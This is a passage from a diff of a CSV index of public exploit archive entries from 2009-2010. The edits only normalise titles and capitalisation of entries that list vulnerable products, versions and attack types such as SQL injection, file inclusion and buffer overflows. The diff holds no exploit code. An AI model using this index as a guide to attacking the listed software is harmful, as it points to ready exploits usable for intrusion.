10515,platforms/php/webapps/10515.txt,"Basic PHP Events Lister 2 - Add Admin Exploit",2009-12-17,RENO,php,webapps,0 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple Cross-Site Request Forgery",2009-12-17,bi0,php,webapps,0 @@ -9783,10 +9784,10 @@ id,file,description,date,author,platform,type,port 10529,platforms/asp/webapps/10529.txt,"eWebquiz 8 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10531,platforms/php/webapps/10531.txt,"jCore CMS - Cross-Site Scripting",2009-12-17,loneferret,php,webapps,0 10532,platforms/php/webapps/10532.txt,"Piwik Open Flash Chart - Remote Code Execution",2009-12-17,"Braeden Thomas",php,webapps,0 -10533,platforms/php/webapps/10533.txt,"VirtueMart - 'product_id' Parameter SQL Injection",2009-12-17,Neo-GabrieL,php,webapps,0 +10533,platforms/php/webapps/10533.txt,"VirtueMart - 'Product_ID' Parameter SQL Injection",2009-12-17,Neo-GabrieL,php,webapps,0 10534,platforms/php/webapps/10534.txt,"Rumba XM - Cross-Site Scripting",2009-12-17,"Hadi Kiamarsi",php,webapps,0 -10535,platforms/php/webapps/10535.txt,"Wordpress Pyrmont 2.x Plugin - SQL Injection",2009-12-18,Gamoscu,php,webapps,0 -10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion Exploit",2009-12-18,"cr4wl3r ",php,webapps,0 +10535,platforms/php/webapps/10535.txt,"WordPress Pyrmont 2.x Plugin - SQL Injection",2009-12-18,Gamoscu,php,webapps,0 +10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 10540,platforms/asp/webapps/10540.txt,"E-Smartcart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69 10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS - SQL Injection",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -9797,7 +9798,7 @@ id,file,description,date,author,platform,type,port 10548,platforms/php/webapps/10548.txt,"Joomla Component com_zcalendar - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 10549,platforms/php/webapps/10549.txt,"Joomla Component Event Manager - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 10550,platforms/php/webapps/10550.txt,"Joomla Component City Portal - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 -10552,platforms/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusion Exploits",2009-12-19,"cr4wl3r ",php,webapps,0 +10552,platforms/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusions",2009-12-19,"cr4wl3r ",php,webapps,0 10553,platforms/hardware/dos/10553.rb,"3Com OfficeConnect Routers - Remote Denial of Service",2009-12-19,"Alberto Ortega Llamas",hardware,dos,0 10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Exploit",2009-12-19,Global-Evolution,php,webapps,0 10556,platforms/windows/local/10556.c,"PlayMeNow 7.3 / 7.4 - Malformed M3U Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0 @@ -9805,9 +9806,9 @@ id,file,description,date,author,platform,type,port 10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure",2009-12-19,"ViRuSMaN ",asp,webapps,0 10560,platforms/php/webapps/10560.txt,"Lizard Cart - Multiple SQL Injections",2009-12-19,"cr4wl3r ",php,webapps,0 10561,platforms/php/webapps/10561.txt,"CFAGCMS - SQL Injection",2009-12-19,"cr4wl3r ",php,webapps,0 -10562,platforms/php/webapps/10562.txt,"Ptag 4.0.0 - Multiple Remote File Inclusion Exploits",2009-12-19,"cr4wl3r ",php,webapps,0 +10562,platforms/php/webapps/10562.txt,"Ptag 4.0.0 - Multiple Remote File Inclusions",2009-12-19,"cr4wl3r ",php,webapps,0 10563,platforms/windows/local/10563.py,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (Windows XP Universal)",2009-12-19,loneferret,windows,local,0 -10564,platforms/php/webapps/10564.txt,"SaurusCMS 4.6.4 - Multiple Remote File Inclusion Exploits",2009-12-19,"cr4wl3r ",php,webapps,0 +10564,platforms/php/webapps/10564.txt,"SaurusCMS 4.6.4 - Multiple Remote File Inclusions",2009-12-19,"cr4wl3r ",php,webapps,0 10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0 10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0 10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Remote File Upload",2009-12-20,"Master Mind",php,webapps,0 @@ -9815,7 +9816,7 @@ id,file,description,date,author,platform,type,port 10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection",2009-12-20,Global-Evolution,php,webapps,0 10571,platforms/php/webapps/10571.txt,"PacketFence Network Access Controller - Cross-Site Scripting",2009-12-20,K053,php,webapps,0 10572,platforms/php/webapps/10572.txt,"4Images 1.7.1 - SQL Injection",2009-12-20,"Master Mind",php,webapps,0 -10573,platforms/asp/webapps/10573.txt,"8pixel.net 2009. - Database Disclosure",2009-12-20,LionTurk,asp,webapps,0 +10573,platforms/asp/webapps/10573.txt,"8Pixel.net 2009. - Database Disclosure",2009-12-20,LionTurk,asp,webapps,0 10574,platforms/php/webapps/10574.txt,"phUploader 2 - Remote File Upload",2009-12-20,wlhaan-hacker,php,webapps,0 10575,platforms/php/webapps/10575.txt,"Drumbeat CMS 1.0 - SQL Injection",2009-12-21,Sora,php,webapps,0 10576,platforms/asp/webapps/10576.txt,"Angelo-emlak 1.0 - Database Disclosure",2009-12-21,LionTurk,asp,webapps,0 @@ -9837,7 +9838,7 @@ id,file,description,date,author,platform,type,port 10594,platforms/php/webapps/10594.txt,"The Uploader 2.0 - Remote File Upload",2009-12-22,"Master Mind",php,webapps,0 10595,platforms/windows/local/10595.pl,"CoolPlayer 2.18 - M3U Playlist Buffer Overflow",2009-12-22,data$hack,windows,local,0 10596,platforms/windows/local/10596.pl,"PlayMeNow - Malformed '.m3u' Universal XP Seh Buffer Overflow",2009-12-22,"ThE g0bL!N",windows,local,0 -10597,platforms/php/webapps/10597.txt,"Active PHP Bookmarks 1.3 - SQL Injection",2009-12-22,Mr.Elgaarh,php,webapps,0 +10597,platforms/php/webapps/10597.txt,"Active PHP BookMarks 1.3 - SQL Injection",2009-12-22,Mr.Elgaarh,php,webapps,0 10598,platforms/php/webapps/10598.txt,"deluxebb 1.3 - Multiple Vulnerabilities",2009-12-22,"cp77fk4r ",php,webapps,0 10599,platforms/php/webapps/10599.txt,"The Uploader 2.0 - File Disclosure",2009-12-22,Stack,php,webapps,0 10600,platforms/php/webapps/10600.txt,"mypage 0.4 - Local File Inclusion",2009-12-22,BAYBORA,php,webapps,0 @@ -9855,12 +9856,12 @@ id,file,description,date,author,platform,type,port 10615,platforms/php/webapps/10615.txt,"PHP-Nuke Module Emporium 2.3.0 - (id_catg) SQL Injection",2009-12-23,"Hussin X",php,webapps,0 10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0 10618,platforms/windows/local/10618.py,"Adobe Reader and Acrobat - Exploit",2009-12-23,"Ahmed Obied",windows,local,0 -10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 - Local Buffer Overflow xp sp2",2009-12-23,bibi-info,windows,local,0 +10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 (Windows XP SP2) - Local Buffer Overflow",2009-12-23,bibi-info,windows,local,0 10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - Buffer Overflow Exploit",2009-12-23,dijital1,windows,local,0 10621,platforms/php/webapps/10621.txt,"XP Book 3.0 - login Admin Exploit",2009-12-23,"wlhaan hacker",php,webapps,0 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman - Cross-Site Scripting",2009-12-24,FL0RiX,php,webapps,0 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection - SQL Injection",2009-12-24,FL0RiX,php,webapps,0 -10626,platforms/php/webapps/10626.txt,"Jax GuestBook 3.50 - Admin Login Exploit",2009-12-24,Sora,php,webapps,0 +10626,platforms/php/webapps/10626.txt,"Jax Guestbook 3.50 - Admin Login Exploit",2009-12-24,Sora,php,webapps,0 10628,platforms/windows/local/10628.pl,"CastRipper 2.50.70 (Windows XP SP3) - '.pls' Stack Buffer Overflow",2009-12-24,d3b4g,windows,local,0 10629,platforms/php/webapps/10629.txt,"Traidnt Gallery - add Admin Exploit",2009-12-24,wlhaan-hacker,php,webapps,0 10630,platforms/multiple/webapps/10630.txt,"ImageVue 2.0 - Remote Admin Login Exploit",2009-12-24,Sora,multiple,webapps,0 @@ -9880,16 +9881,16 @@ id,file,description,date,author,platform,type,port 10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)",2009-12-25,"D3V!L FUCKER",windows,dos,0 10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 - '.asx' Buffer Overflow (PoC)",2009-12-25,"D3V!L FUCKER",windows,dos,0 10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 - Remote File Inclusion",2009-12-25,indoushka,php,webapps,0 -10653,platforms/php/webapps/10653.txt,"Winn GuestBook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 +10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4 / Winn.ws - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10654,platforms/php/webapps/10654.txt,"APHP ImgList 1.2.2 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10655,platforms/php/webapps/10655.txt,"Best Top List - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10656,platforms/php/webapps/10656.txt,"B2B Trading Marketplace - SQL Injection",2009-12-25,"AnGrY BoY",php,webapps,0 10658,platforms/php/webapps/10658.txt,"caricatier 2.5 - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 10660,platforms/php/webapps/10660.txt,"barbo91 uploads - Arbitrary File Upload",2009-12-25,indoushka,php,webapps,0 10661,platforms/php/webapps/10661.txt,"Ads Electronic Al-System - Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 -10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 - (build 330) Stack Overflow",2009-12-25,"Encrypt3d.M!nd ",windows,local,0 -10665,platforms/php/webapps/10665.txt,"Jevonweb GuestBook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 -10666,platforms/php/webapps/10666.txt,"Simple PHP GuestBook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 +10664,platforms/windows/local/10664.py,"ReGet Deluxe 5.2 (build 330) - Stack Overflow",2009-12-25,"Encrypt3d.M!nd ",windows,local,0 +10665,platforms/php/webapps/10665.txt,"Jevonweb Guestbook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 +10666,platforms/php/webapps/10666.txt,"Simple PHP Guestbook - Remote Admin Access Exploit",2009-12-25,Sora,php,webapps,0 10667,platforms/php/webapps/10667.txt,"paFileDB 3.1 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10668,platforms/php/webapps/10668.txt,"phpPowerCards 2.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10669,platforms/php/webapps/10669.txt,"Squito Gallery 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 @@ -9900,7 +9901,7 @@ id,file,description,date,author,platform,type,port 10674,platforms/php/webapps/10674.txt,"DieselScripts jokes - Backup",2009-12-26,indoushka,php,webapps,0 10675,platforms/php/webapps/10675.txt,"Webring - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 -14158,platforms/windows/local/14158.pl,"Mini-Stream RM-MP3 Converter 3.1.2.1 - '.m3u' Buffer Overflow",2010-07-01,Madjix,windows,local,0 +14158,platforms/windows/local/14158.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.m3u' Buffer Overflow",2010-07-01,Madjix,windows,local,0 10677,platforms/php/webapps/10677.txt,"PHPShop 0.6 - Bypass",2009-12-26,indoushka,php,webapps,0 10679,platforms/php/webapps/10679.txt,"Quiz - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10680,platforms/php/webapps/10680.txt,"E-Pay - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 @@ -9911,10 +9912,10 @@ id,file,description,date,author,platform,type,port 10685,platforms/php/webapps/10685.txt,"Best Top List 2.11 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 10686,platforms/asp/webapps/10686.txt,"CactuShop 6.0 - Database Disclosure",2009-12-26,LionTurk,asp,webapps,0 10687,platforms/php/webapps/10687.txt,"SaphpLesson 4.0 food - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 -10688,platforms/php/webapps/10688.txt,"FlatPress - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 +10688,platforms/php/webapps/10688.txt,"Flatpress - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10689,platforms/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 10690,platforms/php/webapps/10690.txt,"IMG2ASCII - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 -10691,platforms/php/webapps/10691.txt,"EZPX My photoblog 1.2 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 +10691,platforms/php/webapps/10691.txt,"EZPX My Photoblog 1.2 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 10692,platforms/php/webapps/10692.txt,"FreeForum 1.7 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10693,platforms/php/webapps/10693.txt,"FreeForum 1.7 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10694,platforms/php/webapps/10694.txt,"ES Simple Uploader 1.1 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 @@ -9922,7 +9923,7 @@ id,file,description,date,author,platform,type,port 10696,platforms/php/webapps/10696.txt,"epay - Backup",2009-12-26,indoushka,php,webapps,0 10697,platforms/php/webapps/10697.txt,"e-pay 1.55 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10698,platforms/php/webapps/10698.txt,"e-cart 3.0 - Multiple Vulnerabilities",2009-12-26,indoushka,php,webapps,0 -10699,platforms/php/webapps/10699.txt,"dB Masters Multimedia - Insecure Cookie Handling",2009-12-26,indoushka,php,webapps,0 +10699,platforms/php/webapps/10699.txt,"dB Masters MultiMedia - Insecure Cookie Handling",2009-12-26,indoushka,php,webapps,0 10700,platforms/php/webapps/10700.txt,"Image File Upload - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 10701,platforms/php/webapps/10701.txt,"HowMany 2.6 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10703,platforms/php/webapps/10703.txt,"kooora 3.0 - AR Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 @@ -9933,7 +9934,7 @@ id,file,description,date,author,platform,type,port 10708,platforms/php/webapps/10708.txt,"MyShoutPro 1.2 Final - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10710,platforms/php/webapps/10710.txt,"Green Desktiny Customer Support Helpdesk 2.3.1 - SQL Injection",2009-12-26,kaMtiEz,php,webapps,0 10711,platforms/php/webapps/10711.txt,"phpAuction - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 -10712,platforms/php/webapps/10712.txt,"Nuked-Klan SP4 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 +10712,platforms/php/webapps/10712.txt,"Nuked-klaN SP4 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10713,platforms/asp/webapps/10713.txt,"Esinti Web Design Gold Defter - Database Disclosure",2009-12-26,LionTurk,asp,webapps,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 10716,platforms/php/webapps/10716.txt,"Datenator 0.3.0 - (event.php id) SQL Injection",2009-12-26,The_HuliGun,php,webapps,0 @@ -9941,7 +9942,7 @@ id,file,description,date,author,platform,type,port 10718,platforms/php/webapps/10718.txt,"ta3arof [dating] Script (Arabic Version) - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 10719,platforms/php/webapps/10719.txt,"PHP Uploader Downloader 2.0 - Arbitrary File Upload",2009-12-26,indoushka,php,webapps,0 10720,platforms/php/webapps/10720.txt,"PHP Football 1.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 -10721,platforms/php/webapps/10721.txt,"Nuked-Klan 1.7.7 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 +10721,platforms/php/webapps/10721.txt,"Nuked-klaN 1.7.7 - Remote File Inclusion",2009-12-26,indoushka,php,webapps,0 10722,platforms/php/webapps/10722.txt,"PHP Uploader Downloader 2.0 - Cross-Site Scripting",2009-12-26,indoushka,php,webapps,0 10725,platforms/php/webapps/10725.txt,"Nuke - SQL Injection",2009-12-27,FormatXformat,php,webapps,0 10726,platforms/php/webapps/10726.txt,"Info Fisier 1.0 - SQL Injection",2009-12-27,"AnGrY BoY",php,webapps,0 @@ -9949,7 +9950,7 @@ id,file,description,date,author,platform,type,port 10728,platforms/php/webapps/10728.txt,"info fisier 1.0 - Multiple Vulnerabilities",2009-12-27,kaozc9,php,webapps,0 10729,platforms/php/webapps/10729.txt,"Joomla Component com_adagency - Exploit",2009-12-27,FL0RiX,php,webapps,0 10730,platforms/php/webapps/10730.txt,"Joomla Component com_intuit - Local File Inclusion",2009-12-27,FL0RiX,php,webapps,0 -10731,platforms/php/webapps/10731.txt,"joomla component memorybook 1.2 - Multiple Vulnerabilities",2009-12-27,jdc,php,webapps,0 +10731,platforms/php/webapps/10731.txt,"joomla Component memorybook 1.2 - Multiple Vulnerabilities",2009-12-27,jdc,php,webapps,0 10732,platforms/php/webapps/10732.txt,"PHP upload - (unijimpe) Remote File Upload",2009-12-27,"wlhaan hacker",php,webapps,0 10733,platforms/php/webapps/10733.txt,"com_webcamxp - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0 10734,platforms/php/webapps/10734.txt,"Joomla Component com_beeheard - Blind SQL Injection",2009-12-27,FL0RiX,php,webapps,0 @@ -9959,13 +9960,13 @@ id,file,description,date,author,platform,type,port 10738,platforms/php/webapps/10738.txt,"Joomla Component com_qpersonel - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0 10739,platforms/php/webapps/10739.txt,"Joomla Component com_oprykningspoint_mc - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0 10740,platforms/php/webapps/10740.txt,"Joomla Component com_trabalhe_conosco - Cross-Site Scripting",2009-12-27,Pyske,php,webapps,0 -10741,platforms/php/webapps/10741.txt,"cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps,0 +10741,platforms/php/webapps/10741.txt,"Cybershade CMS 0.2 - Remote File Inclusion",2009-12-27,Mr.SeCreT,php,webapps,0 10742,platforms/php/webapps/10742.txt,"Joomla Component com_dhforum - SQL Injection",2009-12-27,"ViRuSMaN ",php,webapps,0 10743,platforms/php/webapps/10743.txt,"phPay 2.2a - Backup",2009-12-26,indoushka,php,webapps,0 10744,platforms/windows/local/10744.rb,"Media Jukebox 8.0.400 - (SEH) Buffer Overflow (Metasploit)",2009-12-27,dijital1,windows,local,0 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow",2009-12-27,mr_me,windows,local,0 -10747,platforms/windows/local/10747.py,"Mini-Stream - Windows XP SP2 and SP3 Exploit",2009-12-27,dijital1,windows,local,0 -10748,platforms/windows/local/10748.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)",2009-12-27,dijital1,windows,local,0 +10747,platforms/windows/local/10747.py,"Mini-stream - Windows XP SP2 and SP3 Exploit",2009-12-27,dijital1,windows,local,0 +10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)",2009-12-27,dijital1,windows,local,0 10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 10752,platforms/multiple/webapps/10752.txt,"Yonja - Remote File Upload",2009-12-28,indoushka,multiple,webapps,80 @@ -10013,11 +10014,11 @@ id,file,description,date,author,platform,type,port 10803,platforms/php/webapps/10803.txt,"UBB Threads 6.0 - Remote File Inclusion",2009-12-30,indoushka,php,webapps,0 10805,platforms/php/webapps/10805.txt,"diesel job site 1.4 - Multiple Vulnerabilities",2009-12-30,indoushka,php,webapps,0 10806,platforms/php/webapps/10806.txt,"LiveZilla 3.1.8.3 - Cross-Site Scripting",2009-12-30,MaXe,php,webapps,0 -10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - (detail.php) SQL Injection",2009-12-30,Palyo34,php,webapps,0 +10807,platforms/php/webapps/10807.txt,"XOOPS Module dictionary 2.0.18 - 'detail.php' SQL Injection",2009-12-30,Palyo34,php,webapps,0 10808,platforms/php/webapps/10808.txt,"PHP-Fusion Mod avatar_studio - Local File Inclusion",2009-12-30,bonobug,php,webapps,0 10809,platforms/php/webapps/10809.txt,"I-Escorts Directory - 'country_escorts.php country_id' SQL Injection",2009-12-30,R3d-D3V!L,php,webapps,0 10810,platforms/php/webapps/10810.txt,"FlashChat 3.9.3.1 - PHP info",2009-12-30,indoushka,php,webapps,0 -10811,platforms/php/webapps/10811.txt,"Joomla com_intuit - Apache directory listing Download",2009-12-30,indoushka,php,webapps,0 +10811,platforms/php/webapps/10811.txt,"Joomla com_intuit - Apache Directory listing Download",2009-12-30,indoushka,php,webapps,0 10812,platforms/php/webapps/10812.txt,"WHOISCART - Scripting",2009-12-30,HAQIQ20,php,webapps,0 10813,platforms/php/webapps/10813.txt,"ArticleLive PHP 2005.0.0 - Cross-Site Scripting",2009-12-30,indoushka,php,webapps,0 10816,platforms/php/webapps/10816.txt,"Aptgp.1.3.0c - Cross-Site Scripting",2009-12-30,indoushka,php,webapps,0 @@ -10028,7 +10029,7 @@ id,file,description,date,author,platform,type,port 10822,platforms/php/webapps/10822.txt,"Joomla Component com_rd_download - Local File Disclosure",2009-12-30,FL0RiX,php,webapps,0 10823,platforms/asp/webapps/10823.txt,"UranyumSoft Ýlan Servisi - Database Disclosure",2009-12-30,LionTurk,asp,webapps,0 10824,platforms/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps,0 -10825,platforms/php/dos/10825.sh,"Wordpress 2.9 - Denial of Service",2009-12-31,emgent,php,dos,80 +10825,platforms/php/dos/10825.sh,"WordPress 2.9 - Denial of Service",2009-12-31,emgent,php,dos,80 10826,platforms/php/dos/10826.sh,"Drupal 6.16 / 5.21 - Denial of Service",2009-12-31,emgent,php,dos,80 10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - (bnnr.php) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 @@ -10039,12 +10040,12 @@ id,file,description,date,author,platform,type,port 10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10834,platforms/php/webapps/10834.txt,"Link Trader - (lnkid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0 -10836,platforms/php/webapps/10836.txt,"elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0 +10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0 10837,platforms/php/webapps/10837.txt,"Quick Poll - 'code.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10838,platforms/php/webapps/10838.txt,"list Web - 'addlink.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10839,platforms/php/webapps/10839.txt,"Classified Ads Scrip - 'store_info.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 - '.asx' Denial of Service (PoC)",2009-12-31,"D3V!L FUCKER",windows,dos,0 -10841,platforms/php/webapps/10841.pl,"pL-PHP Beta 0.9 - Local File Inclusion Exploit",2009-12-31,"cr4wl3r ",php,webapps,0 +10841,platforms/php/webapps/10841.pl,"pL-PHP Beta 0.9 - Local File Inclusion",2009-12-31,"cr4wl3r ",php,webapps,0 10842,platforms/windows/dos/10842.py,"SimplePlayer 0.2 - '.wav' Overflow Denial of Service",2009-12-31,mr_me,windows,dos,0 10844,platforms/php/webapps/10844.txt,"Joomla Component com_portfol - SQL Injection",2009-12-31,"wlhaan hacker",php,webapps,0 10845,platforms/php/webapps/10845.txt,"fileNice PHP file browser - Remote File Inclusion / Local File Inclusion",2009-12-31,e.wiZz,php,webapps,0 @@ -10059,7 +10060,7 @@ id,file,description,date,author,platform,type,port 10873,platforms/php/webapps/10873.txt,"Myiosoft EasyGallery - 'catid' Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10874,platforms/php/webapps/10874.txt,"Pre News Manager - (nid) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz - SQL Injection",2009-12-31,"Hussin X",php,webapps,0 -10877,platforms/php/webapps/10877.txt,"PHP-addressbook 3.1.5 - (edit.php) SQL Injection",2009-12-31,"Hussin X",php,webapps,0 +10877,platforms/php/webapps/10877.txt,"PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection",2009-12-31,"Hussin X",php,webapps,0 10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup",2009-12-31,indoushka,php,webapps,0 10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 - Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0 10880,platforms/php/webapps/10880.php,"bbScript 1.1.2.1 - 'id' Blind SQL Injection",2009-12-31,cOndemned,php,webapps,0 @@ -10075,7 +10076,7 @@ id,file,description,date,author,platform,type,port 10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass SQL Injection",2010-01-01,R3d-D3V!L,php,webapps,0 10902,platforms/windows/dos/10902.pl,"Nero Express 7.9.6.4 - Local Heap (PoC)",2010-01-01,"D3V!L FUCKER",windows,dos,0 10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0 -10904,platforms/windows/dos/10904.pl,"Switch Sound File Converter - .mpga Buffer Overflow Denial of Service",2010-01-01,jacky,windows,dos,0 +10904,platforms/windows/dos/10904.pl,"Switch Sound File Converter - '.mpga' Buffer Overflow Denial of Service",2010-01-01,jacky,windows,dos,0 10905,platforms/php/webapps/10905.txt,"Joomla Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0 10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass SQL Injection",2010-01-02,R3d-D3V!L,php,webapps,0 10907,platforms/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial of Services (PoC)",2010-01-02,SarBoT511,windows,dos,0 @@ -10089,7 +10090,7 @@ id,file,description,date,author,platform,type,port 10923,platforms/php/webapps/10923.txt,"superlink script 1.0 - 'id' SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,php,webapps,0 10928,platforms/php/webapps/10928.txt,"Joomla Component com_dailymeals - Local File Inclusion",2010-01-02,FL0RiX,php,webapps,0 -10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin - SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 +10929,platforms/php/webapps/10929.txt,"WordPress Events Plugin - SQL Injection",2010-01-02,Red-D3v1L,php,webapps,0 10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 - SQL Injection",2010-01-02,Sora,php,webapps,0 10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0 10936,platforms/windows/local/10936.c,"PlayMeNow - Malformed M3U Playlist Buffer Overflow (Windows XP SP2 French)",2010-01-03,bibi-info,windows,local,0 @@ -10122,18 +10123,18 @@ id,file,description,date,author,platform,type,port 10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop - (productdetail) SQL Injection",2010-01-03,Err0R,php,webapps,0 10977,platforms/php/webapps/10977.txt,"Smart Vision Script News - 'newsdetail.php' SQL Injection (1)",2010-01-03,Err0R,php,webapps,0 10978,platforms/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection",2010-01-03,Sora,php,webapps,0 -10979,platforms/php/webapps/10979.txt,"Joomla component com_oziogallery2 - / IMAGIN arbitrary file 